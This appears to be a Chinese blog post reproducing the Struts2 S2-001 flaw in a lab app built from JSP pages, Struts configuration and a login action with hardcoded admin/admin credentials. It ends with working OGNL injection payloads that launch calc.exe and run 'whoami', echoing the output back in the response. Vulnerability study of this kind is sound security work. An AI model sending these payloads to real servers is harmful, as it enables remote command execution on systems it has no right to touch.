Struts2 连载系列：S2-001漏洞分析

<%@ page language="java" contentType="text/html; charset=UTF-8"    pageEncoding="UTF-8"%>  <%@ taglib prefix="s" uri="/struts-tags" %>  <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">  <html>  <head>    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">    <title>S2-001</title>  </head>  <body>  <h2>S2-001</h2>  <s:form action="login">    <s:textfield name="username" label="username" />    <s:textfield name="password" label="password" />    <s:submit></s:submit>  </s:form>  </body>  </html>

<%@ page language="java" contentType="text/html; charset=UTF-8"    pageEncoding="UTF-8"%>  <%@ taglib prefix="s" uri="/struts-tags" %>  <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">  <html>  <head>    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">    <title>S2-001</title>  </head>  <body>  <p>Hello <s:property value="username"></s:property></p>  </body>  </html>

<?xml version="1.0" encoding="UTF-8"?>  <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://xmlns.jcp.org/xml/ns/javaee" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd" id="WebApp_ID" version="3.1">      <display-name>S2-001 Example</display-name>      <filter>          <filter-name>struts2</filter-name>          <filter-class>org.apache.struts2.dispatcher.FilterDispatcher</filter-class>      </filter>      <filter-mapping>          <filter-name>struts2</filter-name>          <url-pattern>/*</url-pattern>      </filter-mapping>      <welcome-file-list>          <welcome-file>index.jsp</welcome-file>      </welcome-file-list>  </web-app>

package cc.saferoad.action;  /*  @auther S0cke3t  @date 2021-06-03  */      import com.opensymphony.xwork2.ActionSupport;    public class LoginAction extends ActionSupport {      private String username = null;      private String password = null;        public String getUsername() {          return this.username;      }        public String getPassword() {          return this.password;      }        public void setUsername(String username) {          this.username = username;      }        public void setPassword(String password) {          this.password = password;      }        @Override    public String execute() throws Exception {          if ((this.username.isEmpty()) || (this.password.isEmpty())) {              return "error";          }          if ((this.username.equalsIgnoreCase("admin"))                  && (this.password.equals("admin"))) {              return "success";          }          return "error";      }      }

<?xml version="1.0" encoding="UTF-8" ?>  <!DOCTYPE struts PUBLIC    "-//Apache Software Foundation//DTD Struts Configuration 2.0//EN"   "http://struts.apache.org/dtds/struts-2.0.dtd">  <struts>      <package name="S2-001" extends="struts-default">          <action name="login" class="cc.saferoad.action.LoginAction">              <result name="success">welcome.jsp</result>              <result name="error">index.jsp</result>          </action>      </package>  </struts>

Pop a calc:%{(new java.lang.ProcessBuilder(new java.lang.String[]{“calc.exe”})).start()}Execute os command:%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{“whoami”})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(“com.opensymphony.xwork2.dispatcher.HttpServletResponse”),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}